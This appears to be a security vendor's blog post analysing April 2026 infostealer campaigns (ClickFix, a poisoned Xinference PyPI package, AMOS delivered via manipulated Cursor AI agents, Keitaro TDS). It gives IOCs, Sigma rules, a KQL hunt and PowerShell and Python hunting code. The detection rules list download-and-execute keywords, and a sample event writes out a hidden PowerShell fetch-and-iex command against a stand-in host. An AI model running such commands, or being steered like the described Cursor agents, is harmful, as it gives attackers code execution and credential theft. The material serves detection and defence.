
ClickFix, PyPI Poisoning, & AI Abuse: Coordinated Infostealer Surge — OTX Pulse Analysis

Security Arsenal Team
April 28, 2026
6 min read

Date: 2026-04-28 Source: AlienVault OTX Live Pulses

Threat Summary

Recent OTX pulse data indicates a convergence of high-risk threat activity focusing on credential theft and initial access via software supply chains and AI interfaces. Over the last 72 hours, five distinct pulses highlight a shift from commodity malware to sophisticated, developer-focused attacks.

  • ClickFix Campaigns: The "ClickFix" social engineering technique is resurging. Lures impersonating QuickBooks and Booking.com display a fake error or verification prompt and walk the user through copying a command and running it themselves with native system tools (Living Off the Land: PowerShell, cmd, mshta), so the first malicious process is launched by the victim rather than by an exploit. The staged payloads are Vidar, Lumma Stealer, and Redline.
  • Supply Chain Compromise: The Xinference PyPI package (versions 2.6.0–2.6.2) was poisoned to harvest cloud credentials, while the "GlassWorm" malware targets developers via compromised code repositories, using the Solana blockchain for C2 obfuscation.
  • AI Tool Abuse: A novel campaign delivers the AMOS Stealer by manipulating Cursor AI agent sessions, tricking operators into executing malicious AppleScript.
  • Traffic Distribution: Abuse of the Keitaro TDS platform is facilitating the distribution of DonutLoader, StealC, and ScreenConnect.

Collectively, these campaigns aim to harvest cryptocurrency wallets, development keys, and cloud credentials, likely for initial access brokering and fraud.

Threat Actor / Malware Profile

| Malware / Actor | Distribution Method | Payload Behavior | C2 / Persistence | Notable Techniques |
|---|---|---|---|---|
| ClickFix Clusters | Phishing emails / fake browser alerts | Stealers (Lumma, Vidar, Redline, Odyssey) | Standard HTTP C2 | Uses native tools (cmd, PowerShell) to bypass defenses; Living Off the Land (LotL) |
| GlassWorm | Compromised code repos / packages | Steals crypto wallets and dev creds; installs RAT | Uses Solana blockchain for payload fetching | Sophisticated fingerprinting; fake browser extension for surveillance |
| AMOS Stealer | Social engineering via Cursor AI agent | Credential harvesting; system info theft | Unknown (AppleScript loader) | Exploits trust in AI agents; heavily obfuscated scripts; sandbox evasion |
| Xinference (PyPI) | Supply chain poisoning (PyPI) | Steals cloud credentials | Base64-encoded payload in __init__.py | Executes on install/import; targeted at AI framework users |
| StealC / DonutLoader | Keitaro TDS (malvertising) | Info theft / loader | Traffic Distribution System (TDS) | Domain hijacking; cloaking to avoid security scanners |

IOC Analysis

The provided IOCs span multiple vectors requiring distinct defensive postures:

  • Domains (High Volume): The Keitaro and ClickFix pulses provide a large list of domains (e.g., ustazazharidrus.com, ucaboodle.com, mpasvw.com). These are used for C2 communication, phishing landing pages, and traffic distribution.
    • Action: Block at the DNS layer.
  • File Hashes (PyPI & AMOS): Specific MD5 and SHA256 hashes are provided for the malicious Xinference packages and the AMOS loader.
    • Action: EDR correlation and file system scans.
  • IP Addresses: The AMOS campaign lists specific C2 IPs (45.94.47.204, 92.246.136.14).
    • Action: Firewall blocking.
  • URLs: Specific URLs (e.g., https://arkypc.com/n8n/update) indicate payload staging.
    • Action: Proxy blocking. A DNS or SNI block only sees the host (arkypc.com); matching the full path requires a TLS-inspecting proxy, so block the host outright unless it is shared with legitimate services.

Tooling Recommendation: Use jq to parse the OTX JSON export, and feed IOCs into your SIEM (Splunk/QRadar) and EDR (CrowdStrike/SentinelOne) via API for automated blocking.
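The jq step above is usually where a one-off hunt turns into a pipeline, and the failure mode is pushing an unvalidated export straight into a blocklist. The following Python is an added example (not from the original page, OTX, or any vendor tooling): it walks an export, normalises and validates each indicator by type, keeps malformed entries in a rejected list instead of silently dropping or blocking them, folds the host of each staging URL into the domain list, and renders the `let ... = dynamic([...])` lines in the form the KQL hunt on this page consumes. The sample export is constructed here in the shape of the OTX API output (a `results` list of pulses, each with an `indicators` array of `indicator`/`type` pairs), seeded with indicators quoted on this page plus a few deliberately malformed entries; bucket names and helper functions are my own.

```python
import ipaddress
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in the shape of an OTX pulse export. The well-formed values
# are IOCs quoted on this page; the malformed ones exist only to exercise validation.
SAMPLE_EXPORT = json.dumps({
    "results": [
        {"name": "ClickFix / Keitaro TDS (sample)", "indicators": [
            {"indicator": "ustazazharidrus.com", "type": "domain"},
            {"indicator": "UCABOODLE.COM.", "type": "hostname"},       # mixed case, trailing dot
            {"indicator": "https://arkypc.com/n8n/update", "type": "URL"},
            {"indicator": "not a domain", "type": "domain"},            # rejected
        ]},
        {"name": "AMOS / PyPI (sample)", "indicators": [
            {"indicator": "45.94.47.204", "type": "IPv4"},
            {"indicator": "92.246.136.14", "type": "IPv4"},
            {"indicator": "45.94.47.999", "type": "IPv4"},              # rejected
            {"indicator": "3ee893ae46530b92e0d26435fb979d82", "type": "FileHash-MD5"},
            {"indicator": "3EE893AE46530B92E0D26435FB979D82", "type": "FileHash-MD5"},  # duplicate
            {"indicator": "deadbeef", "type": "FileHash-SHA256"},       # wrong length, rejected
        ]},
    ]
})

DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")
HASH_LEN = {"FileHash-MD5": 32, "FileHash-SHA1": 40, "FileHash-SHA256": 64}


def _clean_domain(value):
    """Lower-case, strip the trailing dot, and require a syntactically valid FQDN."""
    d = value.strip().lower().rstrip(".")
    return d if DOMAIN_RE.match(d) else None


def bucket_indicators(export_json):
    """Group OTX indicators into normalised, validated blocklist buckets.
    Returns {"domains", "ips", "urls", "md5", ...: set} plus "rejected": [(type, raw)]."""
    buckets = defaultdict(set)
    rejected = []
    for pulse in json.loads(export_json)["results"]:
        for ind in pulse.get("indicators", []):
            itype, raw = ind.get("type", ""), ind.get("indicator", "")
            if itype in ("domain", "hostname"):
                d = _clean_domain(raw)
                if d:
                    buckets["domains"].add(d)
                else:
                    rejected.append((itype, raw))
            elif itype == "IPv4":
                try:
                    buckets["ips"].add(str(ipaddress.IPv4Address(raw.strip())))
                except ValueError:
                    rejected.append((itype, raw))
            elif itype == "URL":
                parts = urlsplit(raw.strip())
                host = _clean_domain(parts.hostname or "")
                if parts.scheme in ("http", "https") and host:
                    buckets["urls"].add(raw.strip())
                    buckets["domains"].add(host)   # a staging URL implies its host
                else:
                    rejected.append((itype, raw))
            elif itype in HASH_LEN:
                h = raw.strip().lower()
                if re.fullmatch(r"[0-9a-f]{%d}" % HASH_LEN[itype], h):
                    buckets[itype.split("-")[1].lower()].add(h)
                else:
                    rejected.append((itype, raw))
            else:
                rejected.append((itype, raw))
    result = dict(buckets)
    result["rejected"] = rejected
    return result


def to_kql_dynamic(name, values):
    """Render a bucket as the `let` list used by the KQL hunt, sorted for stable diffs."""
    quoted = ", ".join('"%s"' % v for v in sorted(values))
    return "let %s = dynamic([%s]);" % (name, quoted)


if __name__ == "__main__":
    b = bucket_indicators(SAMPLE_EXPORT)
    for bucket in ("domains", "ips", "urls", "md5", "sha256"):
        print(to_kql_dynamic("IoC_" + bucket, b.get(bucket, set())))
    for itype, value in b["rejected"]:
        print("rejected %s: %r" % (itype, value))
```

Feed the rendered `let` lines into the hunt query and review the rejected list by hand: an indicator that fails validation is usually an analyst typo in the pulse, and pushing it to a firewall either does nothing or blocks the wrong thing.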

Detection Engineering

Sigma Rules

YAML
---
title: Potential ClickFix Social Engineering Activity
id: 89d9f8a2-7b4c-4f2d-9e1a-1c3b5a6b7c8d
description: Detects command interpreters launched with download-and-execute arguments typical of ClickFix lures, where the victim pastes a command copied from a fake browser error or verification page into the Run dialog (parent explorer.exe) or a browser-spawned prompt. The pasted command normally fetches a stager over HTTP, hides its window, and often carries a trailing "I am not a robot" comment.
status: experimental
date: 2026-04-28
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\mshta.exe'
  selection_cli:
    CommandLine|contains:
      - 'iwr '
      - 'irm '
      - 'iex'
      - 'Invoke-WebRequest'
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'mshta'
      - '-w hidden'
      - 'WindowStyle Hidden'
      - 'I am not a robot'
      - 'regsvr32'
      - 'msiexec'
  condition: all of selection_*
falsepositives:
  - Administrators running download one-liners from the Run dialog
  - Legitimate IT support scripts
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.t1204.002
  - attack.t1059.001
---
title: PyPI Package Supply Chain Compromise via Base64
id: 71c2e9b3-8c5d-4e3a-0f2b-2d4e6f8a9b1c
description: Detects a Python interpreter launched with an inline command that decodes and executes a Base64 blob, the hiding technique used by the poisoned Xinference releases. Limitation: the Xinference payload sits in __init__.py and decodes at import time inside an already-running interpreter, so it never appears on a command line; this rule only catches inline "-c" style variants. Scanning site-packages for versions 2.6.0 to 2.6.2 is the primary control.
status: experimental
date: 2026-04-28
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\python.exe'
      - '\pythonw.exe'
  selection_cli:
    CommandLine|contains|all:
      - 'b64decode('
      - 'exec('
  condition: all of selection_*
falsepositives:
  - Build or installation scripts that legitimately inline encoded code
level: medium
tags:
  - attack.initial_access
  - attack.t1195.002
  - attack.defense_evasion
  - attack.t1027
---
title: AMOS Stealer Delivery via Cursor AI Agent
id: 62b1d8c4-7d6e-5f4b-1a3c-3e5f7a9b0c1d
description: Detects shells, osascript, or curl spawned by the Cursor AI IDE with download or URL arguments, the process tree produced when a Cursor agent session is manipulated into running the AppleScript loader that delivers AMOS Stealer. Build tasks launched from the IDE produce the same tree, so baseline per team before alerting.
status: experimental
date: 2026-04-28
author: Security Arsenal
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentImage|contains: 'Cursor'
  selection_child:
    Image|endswith:
      - '/osascript'
      - '/bash'
      - '/zsh'
      - '/sh'
      - '/curl'
  selection_cli:
    CommandLine|contains:
      - 'download'
      - 'http'
      - 'osascript -e'
  condition: all of selection_*
falsepositives:
  - Legitimate developer build scripts and package managers run from the IDE terminal
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.t1204.002
  - attack.t1059.002
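
To see how the ClickFix rule's selection logic behaves before it is deployed, here is an added Python matcher (mine, not part of the page or of any Sigma tooling) that implements Sigma selection semantics for the endswith and contains modifiers, case-insensitively as the Sigma specification requires, and runs them over constructed Sysmon-style process-creation events: a Win+R paste under explorer.exe, a browser-spawned mshta, a benign script launched from Explorer, and a command line that matches the indicator terms but under the wrong parent. The parent list deliberately includes explorer.exe, which is the parent of anything run from the Run dialog and therefore where pasted ClickFix commands usually land; the events and the selection dictionary are constructed for this example.

```python
# Constructed Sysmon-style process_creation events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Win+R paste: the Run dialog runs under explorer.exe
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/f | iex" # I am not a robot',
    },
    {   # browser-spawned mshta variant
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta http://example.invalid/verify",
    },
    {   # benign: a script launched from Explorer, no download/hide terms
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\backup.ps1",
    },
    {   # matching command line but a service parent, so outside the rule's scope
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c mshta http://example.invalid",
    },
]

# The rule's detection block as data: "Field|modifier" -> list of values (OR within a list).
RULE_SELECTION = {
    "ParentImage|endswith": ["\\explorer.exe", "\\chrome.exe", "\\firefox.exe", "\\msedge.exe"],
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\mshta.exe"],
    "CommandLine|contains": [
        "iwr ", "irm ", "iex", "Invoke-WebRequest", "Invoke-Expression", "DownloadString",
        "mshta", "-w hidden", "WindowStyle Hidden", "I am not a robot", "regsvr32", "msiexec",
    ],
}


def field_matches(spec, value, patterns):
    """Evaluate one "Field|modifier" spec against a value. Sigma string matching is
    case-insensitive by default, so both sides are lower-cased; a list of values is OR."""
    _field, _, modifier = spec.partition("|")
    v = str(value).lower()
    for p in patterns:
        p = p.lower()
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "startswith" and v.startswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
        if modifier == "" and v == p:
            return True
    return False


def selection_matches(selection, event):
    """Every field spec in a selection must match (AND); a missing field never matches."""
    for spec, patterns in selection.items():
        field = spec.partition("|")[0]
        if not field_matches(spec, event.get(field, ""), patterns):
            return False
    return True


def hunt(events, selection=RULE_SELECTION):
    """Return the indexes of the events the selection fires on."""
    return [i for i, e in enumerate(events) if selection_matches(selection, e)]


if __name__ == "__main__":
    for i in hunt(SAMPLE_EVENTS):
        print("HIT event %d: %s" % (i, SAMPLE_EVENTS[i]["CommandLine"]))
```

The third event shows the intended gap: a plain script run from Explorer does not fire because none of the download, hide or lure terms are present. The first event also shows the false-positive shape to expect, since an administrator typing `iwr ... | iex` into Run is indistinguishable from the lure; in Sigma that is handled with a `filter` selection of known admin hosts or script paths and a `selection and not filter` condition rather than by weakening the terms.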

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix, Keitaro and AMOS network IOCs from the pulses.
// RemoteUrl may hold a bare hostname or a full URL depending on the event,
// so match domains with has_any rather than an exact "in"; IPs are exact.
// This covers connection attempts; pair it with your DNS telemetry so a
// lookup that was blocked before any connection still surfaces.
let IoC_Domains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "mpasvw.com", "arkypc.com", "ucaboodle.com", "someotherbox.com", "your-link.online", "linda-makeup.com", "cibcsecurity2fa.com", "rbcdevice-login.com", "yellowusheart.net"]);
let IoC_IPs = dynamic(["45.94.47.204", "92.246.136.14"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteIP in (IoC_IPs) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| extend AlertMessage = "OTX Pulse Indicator Match"

PowerShell IOC Hunt

PowerShell
<#
.SYNOPSIS
    IOC Hunt for April 2026 OTX Pulses (PyPI & AMOS)
.DESCRIPTION
    Scans the file system for the MD5 hashes published for the poisoned Xinference
    packages and the AMOS Stealer loader, then checks the hosts file for ClickFix
    and Keitaro domains. Run elevated. A full-disk hash pass is slow; narrow -Path
    to user profiles or build roots when triaging many hosts.
#>
param(
    [string[]]$Path = @("$env:SystemDrive\"),
    [long]$MaxFileBytes = 200MB   # skip VM images, dumps and similar that are never a stager
)

# Hashes from the pulses. A case-insensitive HashSet gives O(1) lookups and
# matches the uppercase hex that Get-FileHash returns.
$TargetHashes = [System.Collections.Generic.HashSet[string]]::new(
    [string[]]@(
        "3ee893ae46530b92e0d26435fb979d82", "484067fd6232f7cdd7b664b33857fc2c",
        "971670c10eff28339a085ca50a600e35", "9b3257e45b27a6bbe4e240e41a3a306f",
        "c6ce4e25f7fe3e3bb1eea2e9052483bf", "e291734d46c313a23d676681499f8846",
        "312147c0ae0d555a4d50fa627ff7d4f3", "c54620dd3745fdeaff5ccc0db4132f11"
    ),
    [System.StringComparer]::OrdinalIgnoreCase
)

Write-Host "Starting IOC scan of $($Path -join ', ')... this may take a while." -ForegroundColor Cyan

# Hash every regular file under the target paths. $Matches is a PowerShell
# automatic variable (set by -match), so results are collected in $Found instead.
$Found = Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -le $MaxFileBytes } |
    ForEach-Object {
        $Hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($Hash -and $TargetHashes.Contains($Hash)) { $_ }
    }

if ($Found) {
    Write-Host "[ALERT] Files matching pulse hashes:" -ForegroundColor Red
    $Found | Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize
} else {
    Write-Host "No matching files found." -ForegroundColor Green
}

# Check the hosts file for ClickFix/Keitaro domains. The domain is regex-escaped so
# the dot is literal, and commented-out lines are ignored.
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$SuspiciousHosts = @("ustazazharidrus.com", "arkypc.com")

$HostsContent = Get-Content -LiteralPath $HostsPath -ErrorAction SilentlyContinue
foreach ($HostEntry in $SuspiciousHosts) {
    $Pattern = [regex]::Escape($HostEntry)
    $Hits = $HostsContent | Where-Object { $_ -match $Pattern -and $_ -notmatch '^\s*#' }
    if ($Hits) {
        Write-Host "[ALERT] Suspicious hosts file entry for ${HostEntry}:" -ForegroundColor Red
        $Hits | ForEach-Object { Write-Host "    $_" -ForegroundColor Red }
    }
}

Response Priorities

  • Immediate:
    • Block all listed domains and IPs at the firewall and proxy level.
    • Scan developer workstations and build servers for the Xinference Python package versions (2.6.0, 2.6.1, 2.6.2).
  • 24 Hours:
    • If credential-stealing malware (AMOS, Lumma, Redline) is suspected, force a password reset for impacted accounts and invalidate active session tokens (Cloud, GitHub, Internal).
    • Audit logs for access to arkypc.com or connections to 45.94.47.204.
  • 1 Week:
    • Implement strict allow-listing for AI coding assistants (Cursor) and monitor their spawned processes.
    • Review software supply chain controls: pin dependencies with hashes (pip --require-hashes), install through an internal mirror or proxy that quarantines newly published releases before developers can pull them, and require signed commits for internal repositories.
    • Educate finance and accounting teams on "ClickFix" fake browser error techniques.
